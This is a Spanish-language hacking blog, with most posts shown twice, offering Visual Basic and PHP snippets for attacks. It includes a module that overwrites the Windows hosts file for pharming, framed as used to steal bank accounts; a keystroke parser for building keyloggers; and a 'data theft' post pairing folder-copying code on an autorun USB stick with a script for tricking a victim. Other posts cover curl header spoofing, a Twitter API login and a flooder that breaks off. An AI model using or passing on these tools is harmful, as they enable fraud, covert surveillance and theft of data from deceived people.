Hosts Poisoning T00l

Antes que todo quería pedir disculpas por escribir tan poco pero ando en época de examenes y pues no tengo tiempo de escribir pero ahora le quiero dar unos minutitos al blog para enseñarles esta t00l tan curiosa que he encontrado...


Dando Vueltas por blogs de malware y troyanos en general, lógico solo para mantenerme actualizado, di con que en Professional Hacker han puesto un módulo con el cual se puede hacer hosts poisoning, que quiero decir con hosts poisoning, ya hemos hablado antes sobre el pharming y esto es pharming, lo que hacemos es modificar el archivo /etc/hosts para que crean que al entrar en una página está todo bien sin embargo están navegando en un fake pero en el browser dice que están en la página real...


Esta técnica se usa para la estafa, la mayoría de veces para robo de cuentas bancarias, esta técnica como antes mencionado se llama pharming, ahora si, aquí podemos ver el ejemplo de un programa que usa lo mas común que es un bat pero lo que les voy a presentar es un módulo que he estado analizando y al parecer funciona a la perfección, lo digo por que los batch para hacer esta función en windows 7 y vista no funcionan bien, por eso el módulo que les daré es tan importante, tiene para hacerlo a windows 7 y windows vista.


el módulo solo te facilita el poder escribir ek módulo pero te da la opción de que hagas un programita con mas funciones...


El Code:


'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''' HOSTS POISONING MODULE BY XA0S '''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Creado por Xa0s '
' www.professional-hacker.org '
' Modulo encargado de editar el archivo Hosts de Windows '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Public Function hosts(insertar As String, windows As String) As String
Dim w2 As String
If windows = 95 Then
w2 = "C:\Windows\hosts"
Else
If windows = 98 Then
w2 = "C:\Windows\hosts"
Else
If windows = "Me" Then
w2 = "C:\Windows\hosts"
Else
If windows = "NT" Then
w2 = "C:\WINNT\System32\drivers\etc\hosts"
Else
If windows = 2000 Then
w2 = "C:\WINNT\System32\drivers\etc\hosts"
Else
If windows = "XP" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = 2003 Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = "Vista" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = "7" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
MsgBox "Error de Sistema Operativo", vbCritical, "Hosts Poisoning Module By Xa0s"
Exit Function
End If
End If
End If
End If
End If
End If
End If
End If
End If
Open w2 For Output As #1
Print #1, "// Hosts Poisoning Module By Xa0s //"
Print #1, insertar
Close #1
End Function

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''' MODO DE USO ''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' call hosts(AQUI LO QUE QUIERAS ESCRIBIR EN EL HOSTS, SISTEMA OPERATIVO) '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' El sistema operativo puede ser: '
'--- 95, 98, ME, 2000, NT, 2003, XP, VISTA, 7 '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''


en el mismo código se especifica mucho...


espero esto les sirva por que yo se los doy con esta idea pero ustedes pueden usarlo para escribir otros archivos, uno nunca sabe algo como esto le pueda servir.


PD: el código no se ve todo pero solo hagan copy paste de lo que se supone está y luego peguenlo en un bloc de notas o en el ide de visual y ya, les saldrá el código mas grande que es el real.

Saludos
Dr.White

Lectura de Teclas

antes que todo disculpen la inactividad del blog pero por motivos personales me ha costado escribir... mm bueno aquí les dejo un pedazo de un módulo con el que podrían crear un programa de lectura de teclas, con este code les quiero ahorrar tiempo a las personas que vayan a crear programas de lectura de teclas como dije anteriormente... también keylogger para control parental o cosas de este tipo:



Public Function ParseText(KeyCode As Integer, Shift As Integer, CapsLock As Integer) As String
On Error Resume Next
If CapsLock = 1 Then Shift = 1
Select Case KeyCode
'Enter key
Case 13
ParseText = vbCrLf

'A-Z
Case 65 To 90
If Shift = 0 Then
ParseText = LCase(Chr(KeyCode))
Else
ParseText = UCase(Chr(KeyCode))
End If

'0-9
Case 48
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "="
End If
Case 49
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "!"
End If
Case 50
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "@"
End If
Case 51
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "#"
End If
Case 52
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "$"
End If
Case 53
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "%"
End If
Case 54
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "&"
End If
Case 55
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "/"
End If
Case 56
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "("
End If
Case 57
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = ")"
End If

' 0-9
Case 96
ParseText = "0"
Case 97
ParseText = "1"
Case 98
ParseText = "2"
Case 99
ParseText = "3"
Case 100
ParseText = "4"
Case 101
ParseText = "5"
Case 102
ParseText = "6"
Case 103
ParseText = "7"
Case 104
ParseText = "8"
Case 105
ParseText = "9"

'NumberPad
Case 144
ParseText = "{Num Lock}"
Case 111
ParseText = "/"
Case 106
ParseText = "*"
Case 109
ParseText = "-"
Case 107
ParseText = "+"
Case 110
ParseText = "."

'Misc Keys
Case 145
ParseText = "{Scroll Lock}"
Case 19
ParseText = "{Pause/Break}"
Case 45
ParseText = "{Insert}"
Case 36
ParseText = "{Inicio}"
Case 33
ParseText = "{Re Pag}"
Case 46
ParseText = "{Supr}"
Case 35
ParseText = "{Fin}"
Case 34
ParseText = "{Av Pag}"


'Arrow Keys
Case 38
ParseText = "{Arriba}"
Case 37
ParseText = "{Izquierda}"
Case 39
ParseText = "{Abajo}"
Case 40
ParseText = "{Derecha}"
Case 44
ParseText = "[Impr Pant]"
'Function Keys
Case 112
ParseText = "{F1}"
Case 113
ParseText = "{F2}"
Case 114
ParseText = "{F3}"
Case 115
ParseText = "{F4}"
Case 116
ParseText = "{F5}"
Case 117
ParseText = "{F6}"
Case 118
ParseText = "{F7}"
Case 119
ParseText = "{F8}"
Case 120
ParseText = "{F9}"
Case 121
ParseText = "{F10}"
Case 122
ParseText = "{F11}"
Case 123
ParseText = "{F12}"

Case 27
ParseText = "{Esc}"
Case 9
ParseText = "{Tab}"
Case 20
ParseText = "{Caps Lock}"
Case 160
'ParseText = "{LeftShift}"
Case 161
'ParseText = "{RightShift}"
Case 17
ParseText = "{Ctrl}"
Case 91
ParseText = "{Win Key}"
Case 92
ParseText = "{Win Key}"
Case 164
ParseText = "{Alt}"
Case 165
ParseText = "{Alt}"
Case 32
ParseText = " "
Case 8
Form_key.Text_key.Text = Left(Form_key.Text_key.Text, Len(Form_key.Text_key.Text) - 1)

'caracteres especiales
Case 189
If Shift = 0 Then
ParseText = "-"
Else
ParseText = "_"
End If
Case 187
If Shift = 0 Then
ParseText = "="
Else
ParseText = "+"
End If
Case 219
If Shift = 0 Then
ParseText = "?"
Else
ParseText = ","
End If
Case 221
If Shift = 0 Then
ParseText = "¿"
Else
ParseText = "¡"
End If
Case 186
If Shift = 0 Then
ParseText = ";"
Else
ParseText = ":"
End If
Case 222
If Shift = 0 Then
ParseText = "'"
Else
ParseText = """"
End If
Case 188
If Shift = 0 Then
ParseText = ","
Else
ParseText = "<"
End If
Case 190
If Shift = 0 Then
ParseText = "."
Else
ParseText = ">"
End If
Case 191
If Shift = 0 Then
ParseText = "/"
Else
ParseText = "?"
End If
Case 220
If Shift = 0 Then
ParseText = "\"
Else
ParseText = "|"
End If
Case 192
If Shift = 0 Then
ParseText = "`"
Else
ParseText = "~"
End If
Case 226
If Shift = 0 Then
ParseText = "<"
Else
ParseText = ">"
End If
End Select
End Function




el código no está 100% hecho por mi fui recolectando pedasos de lugares para armar un código de uso optimo para la captura de teclas... espero les sirva... yo ya lo probe en multiples ocaciones y funciona a la perfección...


Suscribanse ;)



Saludos
Dr.White

Lectura de Teclas

antes que todo disculpen la inactividad del blog pero por motivos personales me ha costado escribir... mm bueno aquí les dejo un pedazo de un módulo con el que podrían crear un programa de lectura de teclas, con este code les quiero ahorrar tiempo a las personas que vayan a crear programas de lectura de teclas como dije anteriormente... también keylogger para control parental o cosas de este tipo:



Public Function ParseText(KeyCode As Integer, Shift As Integer, CapsLock As Integer) As String
On Error Resume Next
If CapsLock = 1 Then Shift = 1
Select Case KeyCode
'Enter key
Case 13
ParseText = vbCrLf

'A-Z
Case 65 To 90
If Shift = 0 Then
ParseText = LCase(Chr(KeyCode))
Else
ParseText = UCase(Chr(KeyCode))
End If

'0-9
Case 48
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "="
End If
Case 49
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "!"
End If
Case 50
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "@"
End If
Case 51
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "#"
End If
Case 52
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "$"
End If
Case 53
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "%"
End If
Case 54
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "&"
End If
Case 55
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "/"
End If
Case 56
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = "("
End If
Case 57
If Shift = 0 Then
ParseText = Chr(KeyCode)
Else
ParseText = ")"
End If

' 0-9
Case 96
ParseText = "0"
Case 97
ParseText = "1"
Case 98
ParseText = "2"
Case 99
ParseText = "3"
Case 100
ParseText = "4"
Case 101
ParseText = "5"
Case 102
ParseText = "6"
Case 103
ParseText = "7"
Case 104
ParseText = "8"
Case 105
ParseText = "9"

'NumberPad
Case 144
ParseText = "{Num Lock}"
Case 111
ParseText = "/"
Case 106
ParseText = "*"
Case 109
ParseText = "-"
Case 107
ParseText = "+"
Case 110
ParseText = "."

'Misc Keys
Case 145
ParseText = "{Scroll Lock}"
Case 19
ParseText = "{Pause/Break}"
Case 45
ParseText = "{Insert}"
Case 36
ParseText = "{Inicio}"
Case 33
ParseText = "{Re Pag}"
Case 46
ParseText = "{Supr}"
Case 35
ParseText = "{Fin}"
Case 34
ParseText = "{Av Pag}"


'Arrow Keys
Case 38
ParseText = "{Arriba}"
Case 37
ParseText = "{Izquierda}"
Case 39
ParseText = "{Abajo}"
Case 40
ParseText = "{Derecha}"
Case 44
ParseText = "[Impr Pant]"
'Function Keys
Case 112
ParseText = "{F1}"
Case 113
ParseText = "{F2}"
Case 114
ParseText = "{F3}"
Case 115
ParseText = "{F4}"
Case 116
ParseText = "{F5}"
Case 117
ParseText = "{F6}"
Case 118
ParseText = "{F7}"
Case 119
ParseText = "{F8}"
Case 120
ParseText = "{F9}"
Case 121
ParseText = "{F10}"
Case 122
ParseText = "{F11}"
Case 123
ParseText = "{F12}"

Case 27
ParseText = "{Esc}"
Case 9
ParseText = "{Tab}"
Case 20
ParseText = "{Caps Lock}"
Case 160
'ParseText = "{LeftShift}"
Case 161
'ParseText = "{RightShift}"
Case 17
ParseText = "{Ctrl}"
Case 91
ParseText = "{Win Key}"
Case 92
ParseText = "{Win Key}"
Case 164
ParseText = "{Alt}"
Case 165
ParseText = "{Alt}"
Case 32
ParseText = " "
Case 8
Form_key.Text_key.Text = Left(Form_key.Text_key.Text, Len(Form_key.Text_key.Text) - 1)

'caracteres especiales
Case 189
If Shift = 0 Then
ParseText = "-"
Else
ParseText = "_"
End If
Case 187
If Shift = 0 Then
ParseText = "="
Else
ParseText = "+"
End If
Case 219
If Shift = 0 Then
ParseText = "?"
Else
ParseText = ","
End If
Case 221
If Shift = 0 Then
ParseText = "¿"
Else
ParseText = "¡"
End If
Case 186
If Shift = 0 Then
ParseText = ";"
Else
ParseText = ":"
End If
Case 222
If Shift = 0 Then
ParseText = "'"
Else
ParseText = """"
End If
Case 188
If Shift = 0 Then
ParseText = ","
Else
ParseText = "<"
End If
Case 190
If Shift = 0 Then
ParseText = "."
Else
ParseText = ">"
End If
Case 191
If Shift = 0 Then
ParseText = "/"
Else
ParseText = "?"
End If
Case 220
If Shift = 0 Then
ParseText = "\"
Else
ParseText = "|"
End If
Case 192
If Shift = 0 Then
ParseText = "`"
Else
ParseText = "~"
End If
Case 226
If Shift = 0 Then
ParseText = "<"
Else
ParseText = ">"
End If
End Select
End Function




el código no está 100% hecho por mi fui recolectando pedasos de lugares para armar un código de uso optimo para la captura de teclas... espero les sirva... yo ya lo probe en multiples ocaciones y funciona a la perfección...


Suscribanse ;)



Saludos
Dr.White

Orientación del PHP al PenTest - curl() [Tuto I]

Hoy voy a hablar de la funcion Curl() de PHP, por el momento lo haremos todo con PHP por el hecho de ser mas comercial que otros lenguajes que contienen esta funcion.


Esta funcion no muchos conocen, se omite muchas veces en el momento de enseñar lenguajes pero con esta se nos facilita mucho lo que es ataque por headers y las descargas que haciamos por headers la podriamos hacer en menos lineas...


Ahora si a la práctica que es lo que nos gusta a todos...

En primera vamos a crear algo simple pero previo les voy a enseñar las funciones mas básicas...


curl_init --> es la funcion que se usa para hacer conexión básica a una direccion web.

curl_opt --> Opt viende de option esta es la funcion que mas trabaja con esto le decimos que opcion de curl queremos que se haga.

curl_exec --> ejecutas el script mejor dicho hace que el curl funcione...(en resumen)

curl_close --> Cierra el Curl, lo termina...


Ahora si miren en primer lugar siempre hay que poner algo como la url que queremos...


<?php

$web = "seguridadblanca.org";

?>


una ves que tenemos eso ya el resto es funciones de curl... les daré el codigo para llamar una web pero despues les explicaré el code...



<?php

$web = "seguridadblanca.org";

$cu = curl_init($web);

curl_setopt($cu, CURLOPT_RETURNTRANSFER, true);

$cu_call = curl_exec($cu);

curl_close($cu);

echo $cu_call;

?>


Listo ahora la primera linea ya vimos para que sirve ahora la segunda...fácil solo empieza la conexion es como si le asignaramos una cookie a la navegación... ahora en el caso de la terceya ya le estamos dando las opciones a hacer, le decimos que a nuestra conexion le haga un returntransfer es decir que devuelva los packetes necesarios y eso que sea 1 es decir que sea true o verdadero.

La cuarta línea pues lo unico que hace es darle un nombre a la ejecución dice ahora ejecuten, es como nuestro F5, ahora si luego ya solo mostramos y cerramos, como se habran dado cuenta es como un socket pero mas fácil de usar nuestro code con sockets necesitaba mas code y eso que ahora hemos hecho un code simple entonces no hay mucha diferencia pero podemos hacer cosas mas utiles...

tenemos para elegir...

CURLOPT_USERAGENT
CURLOPT_COOKIE

Miren como nos asignamos una navegada bien chevere, digamos para tener de referer milw0rm:


$ch = curl_init();
//options
curl_setopt($ch, CURLOPT_URL, "http://www.seguridadblanca.org");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_REFERER, "http://www.milw0rm.com");
curl_setopt($ch, CURLOPT_USERAGENT, "Firefox-beta");

// Se obtiene la URL indicada
curl_exec($ch);

// Se cierra el recurso CURL y se liberan los recursos del sistema
curl_close($ch);


Como ven hemos hecho una conexion rápida sin mostrar nada especial y sin usar tantas variables de especificación sin embargo nos hemos ahorrado algo como:


$cabecera = "GET /web/index.php HTTP/1.1\r\n";
$cabecera .= "Host: host.com\r\n";
$cabecera .= "User-Agent: firefox-beta\r\n";
$cabecera .= "Referer: milw0rm.com\r\n";
$cabecera .= "Connection: Close\r\n\r\n";


como ven con el curl todo es mas simple, yo se que el tuto es un poco confuso sin embargo he intentado explicarme de la mejor manera, es solo un tuto muy básico la proxima semana haré otro que será de como hacer post de cosas para explotar bugs de flooding en correos y visitas...


saludos
Dr.White

Orientación del PHP al PenTest - curl() [Tuto I]

Hoy voy a hablar de la funcion Curl() de PHP, por el momento lo haremos todo con PHP por el hecho de ser mas comercial que otros lenguajes que contienen esta funcion.


Esta funcion no muchos conocen, se omite muchas veces en el momento de enseñar lenguajes pero con esta se nos facilita mucho lo que es ataque por headers y las descargas que haciamos por headers la podriamos hacer en menos lineas...


Ahora si a la práctica que es lo que nos gusta a todos...

En primera vamos a crear algo simple pero previo les voy a enseñar las funciones mas básicas...


curl_init --> es la funcion que se usa para hacer conexión básica a una direccion web.

curl_opt --> Opt viende de option esta es la funcion que mas trabaja con esto le decimos que opcion de curl queremos que se haga.

curl_exec --> ejecutas el script mejor dicho hace que el curl funcione...(en resumen)

curl_close --> Cierra el Curl, lo termina...


Ahora si miren en primer lugar siempre hay que poner algo como la url que queremos...


<?php

$web = "seguridadblanca.org";

?>


una ves que tenemos eso ya el resto es funciones de curl... les daré el codigo para llamar una web pero despues les explicaré el code...



<?php

$web = "seguridadblanca.org";

$cu = curl_init($web);

curl_setopt($cu, CURLOPT_RETURNTRANSFER, true);

$cu_call = curl_exec($cu);

curl_close($cu);

echo $cu_call;

?>


Listo ahora la primera linea ya vimos para que sirve ahora la segunda...fácil solo empieza la conexion es como si le asignaramos una cookie a la navegación... ahora en el caso de la terceya ya le estamos dando las opciones a hacer, le decimos que a nuestra conexion le haga un returntransfer es decir que devuelva los packetes necesarios y eso que sea 1 es decir que sea true o verdadero.

La cuarta línea pues lo unico que hace es darle un nombre a la ejecución dice ahora ejecuten, es como nuestro F5, ahora si luego ya solo mostramos y cerramos, como se habran dado cuenta es como un socket pero mas fácil de usar nuestro code con sockets necesitaba mas code y eso que ahora hemos hecho un code simple entonces no hay mucha diferencia pero podemos hacer cosas mas utiles...

tenemos para elegir...

CURLOPT_USERAGENT
CURLOPT_COOKIE

Miren como nos asignamos una navegada bien chevere, digamos para tener de referer milw0rm:


$ch = curl_init();
//options
curl_setopt($ch, CURLOPT_URL, "http://www.seguridadblanca.org");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_REFERER, "http://www.milw0rm.com");
curl_setopt($ch, CURLOPT_USERAGENT, "Firefox-beta");

// Se obtiene la URL indicada
curl_exec($ch);

// Se cierra el recurso CURL y se liberan los recursos del sistema
curl_close($ch);


Como ven hemos hecho una conexion rápida sin mostrar nada especial y sin usar tantas variables de especificación sin embargo nos hemos ahorrado algo como:


$cabecera = "GET /web/index.php HTTP/1.1\r\n";
$cabecera .= "Host: host.com\r\n";
$cabecera .= "User-Agent: firefox-beta\r\n";
$cabecera .= "Referer: milw0rm.com\r\n";
$cabecera .= "Connection: Close\r\n\r\n";


como ven con el curl todo es mas simple, yo se que el tuto es un poco confuso sin embargo he intentado explicarme de la mejor manera, es solo un tuto muy básico la proxima semana haré otro que será de como hacer post de cosas para explotar bugs de flooding en correos y visitas...


saludos
Dr.White

PHP HACKS - EBOOK

Como ven esta semmana les he puesto mucho o mayor cantidad de lo normal de lo que es programación por que para saber de asegurar un CMS o un SOFTWARE tenemos que saber programar, no necesariamente ser expertos manejando matrices o arreglos pero si saber en nuestro caso que es CURL() SOCKETS y algunas cosas necesarias para poder hacer tests de penetración y para asegurar sistemas.


Hoy les quiero compartir un Excelente e-b00k que pues yo "me saco el sombrero" te enseña prácticas de programación no para un pentester pero te da una muy buena perspectica de como programar para un usuario final y esto combinado con sierto conocimiento de pentest pues quedaría muy bien...

Espero les guste este libro, te enseña a combinar configuraciones de XML con el PHP, te da buenas prácticas de programación este libro lo leí hace tiempo, como se han dado cuenta leo mucho, pero sinceramente esa es la forma de aprender leer y practicar les dejo este ebook que en mi parecer es genial.

Descarga de rapidshare


PD: me inspiré un poco jajaja

Saludos
Dr.White

PHP HACKS - EBOOK

Como ven esta semmana les he puesto mucho o mayor cantidad de lo normal de lo que es programación por que para saber de asegurar un CMS o un SOFTWARE tenemos que saber programar, no necesariamente ser expertos manejando matrices o arreglos pero si saber en nuestro caso que es CURL() SOCKETS y algunas cosas necesarias para poder hacer tests de penetración y para asegurar sistemas.


Hoy les quiero compartir un Excelente e-b00k que pues yo "me saco el sombrero" te enseña prácticas de programación no para un pentester pero te da una muy buena perspectica de como programar para un usuario final y esto combinado con sierto conocimiento de pentest pues quedaría muy bien...

Espero les guste este libro, te enseña a combinar configuraciones de XML con el PHP, te da buenas prácticas de programación este libro lo leí hace tiempo, como se han dado cuenta leo mucho, pero sinceramente esa es la forma de aprender leer y practicar les dejo este ebook que en mi parecer es genial.

Descarga de rapidshare


PD: me inspiré un poco jajaja

Saludos
Dr.White

Ruby - Si queremos Programar el Metaspl0it

Para los que no sabían metaspl0it está programado en un lenguaje orientado a objetos conocido como RUBY, lo quize estudiar pero me ha gustado mucho el pyth0n y pues es difícil aprender muchos lenguajes a la ves así que me gustaría compartirles unos cuantos documentos de ruby para aquellos que quieren aprender este lenguaje, los documentos lo elejí por que creo que son buenos.


Ruby CookBook - Click Aquí


Creanme les da un amplio panorama del mundo del ruby, su funcionamiento y los enseña a relacionarlo con el html y el xml lo recomiendo.


Este Libro apenas lo voy a leer, es la segunda edición de un libro con el que aprendieron muchos conocidos mios aun no lo tengo en mi PC pero ahora lo descargo.

Click Aquí


Libro muy completo que te da una buena espectativa y funcionamiento de lo que es ruby este lo estoy leyendo o mejor dicho estaba hasta que comenze con el pyth0n.

Click Aquí o el PDF


Pueden buscar otros tutoriales en la red pero para darles una perspectiva profesional de lo que es ruby estos son sus ebooks.


Saludos
Dr.White

Ruby - Si queremos Programar el Metaspl0it

Para los que no sabían metaspl0it está programado en un lenguaje orientado a objetos conocido como RUBY, lo quize estudiar pero me ha gustado mucho el pyth0n y pues es difícil aprender muchos lenguajes a la ves así que me gustaría compartirles unos cuantos documentos de ruby para aquellos que quieren aprender este lenguaje, los documentos lo elejí por que creo que son buenos.


Ruby CookBook - Click Aquí


Creanme les da un amplio panorama del mundo del ruby, su funcionamiento y los enseña a relacionarlo con el html y el xml lo recomiendo.


Este Libro apenas lo voy a leer, es la segunda edición de un libro con el que aprendieron muchos conocidos mios aun no lo tengo en mi PC pero ahora lo descargo.

Click Aquí


Libro muy completo que te da una buena espectativa y funcionamiento de lo que es ruby este lo estoy leyendo o mejor dicho estaba hasta que comenze con el pyth0n.

Click Aquí o el PDF


Pueden buscar otros tutoriales en la red pero para darles una perspectiva profesional de lo que es ruby estos son sus ebooks.


Saludos
Dr.White

Robo de Datos Muy Simple con Visual Basic

En mis épocas de inmadures en la red tenia ideas de crear w0rms que sirvan para robar conversaciones del msn segun mis victimas infectadas y pues me gustaría compartir el código y funciones de como lo hice y que codigo use yo para que vean que la imaginación no tiene limites y ustedes pueden hacer con imaginación lo que sea...


Como Recordarán hace un tiempo puse una entrada sobre como hacer para infectar con autorun Ahora podremos poner en práctica esos conocimientos pero no necesariamente para infectar como explique en ese mismo tutorial tambien se puede hacer para robo de datos y es lo que haremos ahora...


Primero vamos a ir a visual basic y vamos a crear un nuevo proyecto ahora vamos a llamar el complemento Microsoft Scripting Runtime se escucha profesional no? pues no tanto con esto no haremos mucho mas bien usaremos el FilySystemObject que desde ahora también le podremos decir FSO...

Bueno como ahora hemos empezado con la programación primero les daré el code que pondremos en el form_load()

Dim fso As New FileSystemObject
fso.CopyFolder "c:\windows", "d:\robado", True



Nuestro Code es Básico y Fácil ahora viene la parte difícil, ustedes dirán... como hacemos ahora?

Primero deben aprender que siempre tienen que probar primero lo que sea con ustedes mismos esto es como ser mago, primero tienes que probar los trucos frente al espejo...


Ahora necesitaremos un poco de ingeniería social le diremos que en el pendrive tenemos algo que le queremos mostrar, tendremos dos por si la situación se pone media difícil, ahora meteremos el que tiene el programa malicioso y usaremos la frase magnifica... "Sierto... lo deje en mi casa"... y luego de dos minutos le diremos al usuario estafado creo que lo tengo en mi otro pendrive y lo metemos y no habrá nada entonces diremos "chu...no... si se me olvido pero mañana lo traigo"... como ven no es tan difícil engañar a tu víctima...

Para los que no lo deducieron en el primer pendrive tenemos que tener nuestro programa .exe con el anterior codigo y un autorun que podemos ver en el tutorial que hicimos y que esta mencionado en el principio del segundo parrafo.


Espero les haya gustado este mini artículo de convinar el robo de datos de las pcs con ingeniería social física...


Un Saludo
Dr.White

Robo de Datos Muy Simple con Visual Basic

En mis épocas de inmadures en la red tenia ideas de crear w0rms que sirvan para robar conversaciones del msn segun mis victimas infectadas y pues me gustaría compartir el código y funciones de como lo hice y que codigo use yo para que vean que la imaginación no tiene limites y ustedes pueden hacer con imaginación lo que sea...


Como Recordarán hace un tiempo puse una entrada sobre como hacer para infectar con autorun Ahora podremos poner en práctica esos conocimientos pero no necesariamente para infectar como explique en ese mismo tutorial tambien se puede hacer para robo de datos y es lo que haremos ahora...


Primero vamos a ir a visual basic y vamos a crear un nuevo proyecto ahora vamos a llamar el complemento Microsoft Scripting Runtime se escucha profesional no? pues no tanto con esto no haremos mucho mas bien usaremos el FilySystemObject que desde ahora también le podremos decir FSO...

Bueno como ahora hemos empezado con la programación primero les daré el code que pondremos en el form_load()

Dim fso As New FileSystemObject
fso.CopyFolder "c:\windows", "d:\robado", True



Nuestro Code es Básico y Fácil ahora viene la parte difícil, ustedes dirán... como hacemos ahora?

Primero deben aprender que siempre tienen que probar primero lo que sea con ustedes mismos esto es como ser mago, primero tienes que probar los trucos frente al espejo...


Ahora necesitaremos un poco de ingeniería social le diremos que en el pendrive tenemos algo que le queremos mostrar, tendremos dos por si la situación se pone media difícil, ahora meteremos el que tiene el programa malicioso y usaremos la frase magnifica... "Sierto... lo deje en mi casa"... y luego de dos minutos le diremos al usuario estafado creo que lo tengo en mi otro pendrive y lo metemos y no habrá nada entonces diremos "chu...no... si se me olvido pero mañana lo traigo"... como ven no es tan difícil engañar a tu víctima...

Para los que no lo deducieron en el primer pendrive tenemos que tener nuestro programa .exe con el anterior codigo y un autorun que podemos ver en el tutorial que hicimos y que esta mencionado en el principio del segundo parrafo.


Espero les haya gustado este mini artículo de convinar el robo de datos de las pcs con ingeniería social física...


Un Saludo
Dr.White

Twittiemos con Programación ;)

Gracias al Proyecto conocido como PHP Twitter nosotros podemos escribir tweets y hacer una gran variedad de cosas con este proyecto que por medio de los APIS de Twitter te permite hacer muchas cosas...

Bueno pues por ahora les mostraré un ejemplo simple como loguearnos...


<?php

include "twitter.php";

$twit_login = new Twitter("usuario","contraseña");

?>


Con ese code nos loguearemos, básicamente lo que hacemos es llamar al archivo twitter.php que es nuestro archivo que nos hará posible escribir tweets y mas cosas...

Ahora como ya vieron con la funcion Twitter() nos hemos logueado... ahora... para escribir un tweet...


<?php

include "twitter.php";

$twit_login = new Twitter("usuario","contraseña");

$tweet = "Aprenda a usar twitter con php";

$twit_login->updateStatus($tweet);

?>


hemos usado la funcion update status y me gusta por que se relaciona en la syntaxis un poco con siertas cosas del perl...

Espero les sirva y pues asi pueden hacer webs con utilidades mas haya de las normales...


Referencias:

Woork Blog


Saludos
Dr.White

Twittiemos con Programación ;)

Gracias al Proyecto conocido como PHP Twitter nosotros podemos escribir tweets y hacer una gran variedad de cosas con este proyecto que por medio de los APIS de Twitter te permite hacer muchas cosas...

Bueno pues por ahora les mostraré un ejemplo simple como loguearnos...


<?php

include "twitter.php";

$twit_login = new Twitter("usuario","contraseña");

?>


Con ese code nos loguearemos, básicamente lo que hacemos es llamar al archivo twitter.php que es nuestro archivo que nos hará posible escribir tweets y mas cosas...

Ahora como ya vieron con la funcion Twitter() nos hemos logueado... ahora... para escribir un tweet...


<?php

include "twitter.php";

$twit_login = new Twitter("usuario","contraseña");

$tweet = "Aprenda a usar twitter con php";

$twit_login->updateStatus($tweet);

?>


hemos usado la funcion update status y me gusta por que se relaciona en la syntaxis un poco con siertas cosas del perl...

Espero les sirva y pues asi pueden hacer webs con utilidades mas haya de las normales...


Referencias:

Woork Blog


Saludos
Dr.White

Aprendamos Pyth0n Juntos

Bueno ahora les escribo para decirles que el dia de hoy he comenzado a aprender pyth0n... no tengo mucho tiempo para aprender pero voy a dejar un poco de lado el perl para practicar el python... me han dicho que se parecen pero que el python es mas ordenado e inclusive mas fácil, les quiero recomendar lo que estoy leyendo para que aprendamos juntos =)

El primer manual es un PDF que se llama Pyth0n para todos...


Click para ver Pyth0n para Todos

Ahora aquí les dejo otro manual de Sockets en pyth0n no muy bueno pero te da un resumen rápido:

Click Aquí

Tambien estoy leyendo estos manuales hechos por ricardo narvaja:

Click aquí para verlos


Espero que podamos compartir luego nuestros programas y hacer cosas provechosas con el conocimiento que adquiramos despues de leer...


Saludos
Dr.White

Aprendamos Pyth0n Juntos

Bueno ahora les escribo para decirles que el dia de hoy he comenzado a aprender pyth0n... no tengo mucho tiempo para aprender pero voy a dejar un poco de lado el perl para practicar el python... me han dicho que se parecen pero que el python es mas ordenado e inclusive mas fácil, les quiero recomendar lo que estoy leyendo para que aprendamos juntos =)

El primer manual es un PDF que se llama Pyth0n para todos...


Click para ver Pyth0n para Todos

Ahora aquí les dejo otro manual de Sockets en pyth0n no muy bueno pero te da un resumen rápido:

Click Aquí

Tambien estoy leyendo estos manuales hechos por ricardo narvaja:

Click aquí para verlos


Espero que podamos compartir luego nuestros programas y hacer cosas provechosas con el conocimiento que adquiramos despues de leer...


Saludos
Dr.White

Haciendo un Flooder con Visual Basic

Hoy quería enseñar un poco el tema de los sendkeys para quien sabe jaja uso personal... y pues que mejor manera que empesar con un flooder...


Bueno primero que todo habran su visual basic 6 y pongan lo siguiente:

Private Declare Function GetKeyPress Lib "user32" Alias "GetAsyncKeyState" (ByVal key As Long) As Integer

no hagan caso al code jaja solo ponganlo...


ahora pues les voy a enseñar la parte importante... vamos a poner en el form un timer y vamos a poner en el form_load lo siguiente:

Timer1.Interval = "100"

tambien lo pueden hacer desde las propiedades del timer si gustan...

Ahora dentro del Timer1_Timer pondrán:

If GetKeyPress(vbKeyF1) Then
